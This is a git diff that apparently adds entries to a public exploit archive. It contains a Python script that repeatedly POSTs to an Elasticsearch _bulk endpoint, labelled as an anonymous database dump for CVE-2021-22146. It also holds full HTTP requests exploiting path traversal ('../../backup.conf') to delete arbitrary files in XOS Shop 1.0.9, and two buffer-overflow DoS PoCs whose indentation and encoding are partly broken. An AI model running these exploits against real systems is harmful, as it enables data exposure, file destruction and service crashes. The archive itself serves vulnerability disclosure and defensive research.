diff --git a/exploits/multiple/webapps/50152.py b/exploits/multiple/webapps/50152.py new file mode 100755 index 000000000..a9a726d00 --- /dev/null +++ b/exploits/multiple/webapps/50152.py @@ -0,0 +1,65 @@ +# Exploit Title: Elasticsearch ECE 7.13.3 - Anonymous Database Dump +# Date: 2021-07-21 +# Exploit Author: Joan Martinez @magichk +# Vendor Homepage: https://www.elastic.co/ +# Software Link: https://www.elastic.co/ +# Version: >= 7.10.0 to <= 7.13.3 +# Tested on: Elastic ECE (Cloud) +# CVE : CVE-2021-22146 +# Reference: https://discuss.elastic.co/t/elastic-cloud-enterprise-security-update/279180 + +import os +import argparse +import sys + +######### Check Arguments +def checkArgs(): + parser = argparse.ArgumentParser() + parser = argparse.ArgumentParser(description='Elasticdump 1.0\n') + parser.add_argument('-s', "--host", action="store", + dest='host', + help="Host to attack.") + parser.add_argument('-p', "--port", action="store", + dest='port', + help="Elastic search port by default 9200 or 9201") + parser.add_argument('-i', "--index", action="store", + dest='index', + help="Index to dump (Example: 30)") + + + args = parser.parse_args() + if (len(sys.argv)==1) or (args.host==False) or (args.port==False) or (args.index==False and arg.dump==False) : + parser.print_help(sys.stderr) + sys.exit(1) + return args + +def banner(): + print(" _ _ _ _") + print(" ___| | __ _ ___| |_(_) ___ __| |_ _ _ __ ___ _ __") + print(" / _ \ |/ _` / __| __| |/ __/ _` | | | | '_ ` _ \| '_ \ ") + print("| __/ | (_| \__ \ |_| | (_| (_| | |_| | | | | | | |_) |") + print(" \___|_|\__,_|___/\__|_|\___\__,_|\__,_|_| |_| |_| .__/") + print(" |_|") + + + +def exploit(host,port,index): + + if (index != 0): + final = int(index) + else: + final = 1000000000 + + cont = 0 + while (cont <= final): + os.system("curl -X POST \""+host+":"+port+"/_bulk\" -H 'Content-Type: application/x-ndjson' --data-binary $'{\x0d\x0a\"index\" : {\x0d\x0a \"_id\" :\""+str(cont)+"\"\x0d\x0a}\x0d\x0a}\x0d\x0a' -k -s") + cont = cont + 1 + +if __name__ == "__main__": + + banner() + args = checkArgs() + if (args.index): + exploit(args.host,args.port,args.index) + else: + exploit(args.host,args.port,0) \ No newline at end of file diff --git a/exploits/php/webapps/50155.txt b/exploits/php/webapps/50155.txt new file mode 100644 index 000000000..847f83657 --- /dev/null +++ b/exploits/php/webapps/50155.txt @@ -0,0 +1,216 @@ +# Exploit Title: XOS Shop 1.0.9 - 'Multiple' Arbitrary File Deletion (Authenticated) +# Date: 2021-07-25 +# Exploit Author: faisalfs10x (https://github.com/faisalfs10x) +# Vendor Homepage: https://xos-shop.com +# Software Link: https://github.com/XOS-Shop/xos_shop_system/releases/tag/v1.0.9 +# Version: 1.0.9 +# Tested on: Windows 10, XAMPP +# Reference: https://github.com/XOS-Shop/xos_shop_system/issues/1 + + +################ +# Description # +################ + +# XOS-Shop is a further development of the well-known open source webshop system "osCommerce". The XOS-Shop prior to version 1.0.9 suffers from an arbitrary file deletion vulnerability in Admin Panel. Exploiting the vulnerability allows an authenticated attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker might leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints. + + +########## +# PoC 1 # +########## + +Vulnerable URL: http://localhost/xos_shop_v1.0.9/shop/admin/manufacturers.php +Vulnerable Code: line 66 - xos_shop_v1.0.9\shop\admin\manufacturers.php + +Steps to Reproduce: + +1. Login as admin +2. Goto Catalog > Manufacturers > edit any manufacturer +3. Upload any image as "Manufacturers Image" and click save button +4. Then, tick "Delete" checkbox and click save button +5. Intercept the request and replace existing image name to any files on the server via parameter "current_manufacturer_image". + +# Assumed there is a backup.conf file in web root + +PoC #1) param current_manufacturer_image - Deleting backup.conf file in web root + +Request: +======== + +POST /xos_shop_v1.0.9/shop/admin/manufacturers.php?page=1&mID=10&action=save HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------120849309142309531191692203678 +Content-Length: 1305 +Origin: http://localhost +DNT: 1 +Connection: close +Referer: http://localhost/xos_shop_v1.0.9/shop/admin/manufacturers.php?page=1&mID=10&action=edit +Cookie: XOSsidAdmin=os13rkgs85m47iak7l8ck2j1ja +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 +Sec-GPC: 1 + +-----------------------------120849309142309531191692203678 +Content-Disposition: form-data; name="manufacturers_name[2]" + +App +-----------------------------120849309142309531191692203678 +Content-Disposition: form-data; name="manufacturers_name[1]" + +App +-----------------------------120849309142309531191692203678 +Content-Disposition: form-data; name="manufacturers_name[3]" + +App +-----------------------------120849309142309531191692203678 +Content-Disposition: form-data; name="manufacturers_url[2]" + +app.com +-----------------------------120849309142309531191692203678 +Content-Disposition: form-data; name="manufacturers_url[1]" + +app.com +-----------------------------120849309142309531191692203678 +Content-Disposition: form-data; name="manufacturers_url[3]" + +app.com +-----------------------------120849309142309531191692203678 +Content-Disposition: form-data; name="delete_manufacturer_image" + +true +-----------------------------120849309142309531191692203678 +Content-Disposition: form-data; name="current_manufacturer_image" + +../../backup.conf +-----------------------------120849309142309531191692203678 +Content-Disposition: form-data; name="manufacturers_image"; filename="" +Content-Type: application/octet-stream + +-----------------------------120849309142309531191692203678-- + +--- + + +########## +# PoC 2 # +########## + +Vulnerable URL: http://localhost/xos_shop_v1.0.9/shop/admin/categories.php +Vulnerable Code: line 154-156, 167-169, 421-425, 433-437 - xos_shop_v1.0.9\shop\admin\categories.php +Note: Multiple parameters affected + +Steps to Reproduce: + +1. Login as admin +2. Goto Catalog > Categories/Products > edit any category +3. Upload any image as "Category Image" if there is no existing image and click save button else, +4. Tick "Delete" checkbox and click save button +5. Intercept the request and replace existing image name to any files on the server via parameter "current_category_image". + +# Assumed there is a backup.conf file in web root + +PoC #2) param current_category_image - Deleting backup.conf file in web root + +Request: +======== + +POST /xos_shop_v1.0.9/shop/admin/categories.php?action=update_category&cPath=&cpID=1 HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------95672159210084798032704634599 +Content-Length: 2524 +Origin: http://localhost +DNT: 1 +Connection: close +Referer: http://localhost/xos_shop_v1.0.9/shop/admin/categories.php?cPath=&cpID=1&action=new_category +Cookie: XOSsidAdmin=os13rkgs85m47iak7l8ck2j1ja +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 +Sec-GPC: 1 + +-----------------------------95672159210084798032704634599 +Content-Disposition: form-data; name="categories_or_pages_id" + +1 +-----------------------------95672159210084798032704634599 +Content-Disposition: form-data; name="current_category_image" + +../../../backup.conf +-----------------------------95672159210084798032704634599 +Content-Disposition: form-data; name="category_name" + +Hardware +-----------------------------95672159210084798032704634599 +Content-Disposition: form-data; name="current_categories_or_pages_status" + +1 +-----------------------------95672159210084798032704634599 +Content-Disposition: form-data; name="delete_category_image" + +true +-----------------------------95672159210084798032704634599 +Content-Disposition: form-data; name="categories_image"; filename="" +Content-Type: application/octet-stream + +-----------------------------95672159210084798032704634599 +Content-Disposition: form-data; name="product_list_b" + +0 +-----------------------------95672159210084798032704634599 +Content-Disposition: form-data; name="sort_order" + +10 +-----------------------------95672159210084798032704634599 +Content-Disposition: form-data; name="categories_or_pages_status" + +1 +-----------------------------95672159210084798032704634599 +Content-Disposition: form-data; name="categories_or_pages_name[2]" + +Hardware +-----------------------------95672159210084798032704634599 +Content-Disposition: form-data; name="categories_or_pages_name[1]" + +Hardware +-----------------------------95672159210084798032704634599 +Content-Disposition: form-data; name="categories_or_pages_name[3]" + +Hardware +-----------------------------95672159210084798032704634599 +Content-Disposition: form-data; name="categories_or_pages_heading_title[2]" + +-----------------------------95672159210084798032704634599 +Content-Disposition: form-data; name="categories_or_pages_heading_title[1]" + +-----------------------------95672159210084798032704634599 +Content-Disposition: form-data; name="categories_or_pages_heading_title[3]" + +-----------------------------95672159210084798032704634599 +Content-Disposition: form-data; name="categories_or_pages_content[2]" + +-----------------------------95672159210084798032704634599 +Content-Disposition: form-data; name="categories_or_pages_content[1]" + +-----------------------------95672159210084798032704634599 +Content-Disposition: form-data; name="categories_or_pages_content[3]" + +-----------------------------95672159210084798032704634599-- + +--- + + +# For more explanation, you can refer to the github issue on XOS-Shop via https://github.com/XOS-Shop/xos_shop_system/issues/1 +# The affected version is prior to v1.0.9. \ No newline at end of file diff --git a/exploits/windows/dos/50153.py b/exploits/windows/dos/50153.py new file mode 100755 index 000000000..489068b47 --- /dev/null +++ b/exploits/windows/dos/50153.py @@ -0,0 +1,27 @@ +# Exploit Title: Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC) +# Date: 25.07.2021 +# Vendor Homepage:https://www.leawo.org +# Software Link: https://www.leawo.org/downloads/total-media-converter-ultimate.html +# Exploit Author: Achilles +# Tested Version: 11.0.0.1 +# Tested on: Windows 7 x64 + + +# 1.- Run python code : +# 2.- Open EVIL.txt and copy content to clipboard +# 3.- Open Leawo Prof. Media +# 4.- Click Activation Center +# 5.- Paste the content of EVIL.txt into the Field: 'Keycode' +# 6.- Click 'Register' and you will see a crash. + +#!/usr/bin/env python +buffer =3D "\x41" * 6000 + +try: +f = open("Evil.txt","w") +print "[+] Creating %s bytes evil payload.." %len(buffer) +f.write(buffer) +f.close() +print "[+] File created!" +except: +print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows/webapps/50154.py b/exploits/windows/webapps/50154.py new file mode 100755 index 000000000..26764f071 --- /dev/null +++ b/exploits/windows/webapps/50154.py @@ -0,0 +1,27 @@ +# Exploit Title: NoteBurner 2.35 - Denial Of Service (DoS) (PoC) +# Date: 25.07.2021 +# Vendor Homepage:https://www.noteburner.com/ +# Software Link: https://anonfiles.com/13h9Hb82ub/noteburner_exe +# Exploit Author: Achilles +# Tested Version: 2.35 +# Tested on: Windows 7 x64 + + +# 1.- Run python code : +# 2.- Open EVIL.txt and copy content to clipboard +# 3.- Open Noteburner +# 4.- Click More and Enter License Code +# 5.- Paste the content of EVIL.txt into the Field: 'Name' and 'Code' +# 6.- Click 'OK' and you will see a crash. + +#!/usr/bin/env python +buffer = "\x41" * 6000 + +try: +f=open("Evil.txt","w") +print "[+] Creating %s bytes evil payload.." %len(buffer) +f.write(buffer) +f.close() +print "[+] File created!" +except: +print "File cannot be created" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 1f15571b6..aeb4ab57d 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6796,6 +6796,7 @@ id,file,description,date,author,type,platform,port 50001,exploits/ios/dos/50001.py,"Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC)",2021-06-14,"Geovanni Ruiz",dos,ios, 50002,exploits/ios/dos/50002.py,"Post-it 5.0.1 - Denial of Service (PoC)",2021-06-14,"Geovanni Ruiz",dos,ios, 50003,exploits/ios/dos/50003.py,"Notex the best notes 6.4 - Denial of Service (PoC)",2021-06-14,"Geovanni Ruiz",dos,ios, +50153,exploits/windows/dos/50153.py,"Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC)",2021-07-26,stresser,dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -43509,6 +43510,7 @@ id,file,description,date,author,type,platform,port 48745,exploits/php/webapps/48745.txt,"GetSimple CMS Plugin Multi User 1.8.2 - Cross-Site Request Forgery (Add Admin)",2020-08-13,boku,webapps,php, 48746,exploits/php/webapps/48746.rb,"Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass",2020-08-17,"Alexandre ZANNI",webapps,php, 48747,exploits/aspx/webapps/48747.py,"Microsoft SharePoint Server 2019 - Remote Code Execution",2020-08-17,"West Shepherd",webapps,aspx, +50152,exploits/multiple/webapps/50152.py,"Elasticsearch ECE 7.13.3 - Anonymous Database Dump",2021-07-26,"Joan Martinez",webapps,multiple, 48748,exploits/hardware/webapps/48748.txt,"QiHang Media Web Digital Signage 3.0.9 - Cleartext Credential Disclosure",2020-08-17,LiquidWorm,webapps,hardware, 48749,exploits/hardware/webapps/48749.txt,"QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Deletion",2020-08-17,LiquidWorm,webapps,hardware, 48750,exploits/hardware/webapps/48750.txt,"QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Disclosure",2020-08-17,LiquidWorm,webapps,hardware, @@ -44285,3 +44287,5 @@ id,file,description,date,author,type,platform,port 50149,exploits/multiple/webapps/50149.py,"ElasticSearch 7.13.3 - Memory disclosure",2021-07-23,r0ny,webapps,multiple, 50150,exploits/php/webapps/50150.txt,"WordPress Plugin Simple Post 1.1 - 'Text field' Stored Cross-Site Scripting (XSS)",2021-07-23,"Vikas Srivastava",webapps,php, 50151,exploits/aspx/webapps/50151.py,"Microsoft SharePoint Server 2019 - Remote Code Execution (2)",2021-07-23,Podalirius,webapps,aspx, +50154,exploits/windows/webapps/50154.py,"NoteBurner 2.35 - Denial Of Service (DoS) (PoC)",2021-07-26,stresser,webapps,windows, +50155,exploits/php/webapps/50155.txt,"XOS Shop 1.0.9 - 'Multiple' Arbitrary File Deletion (Authenticated)",2021-07-26,faisalfs10x,webapps,php,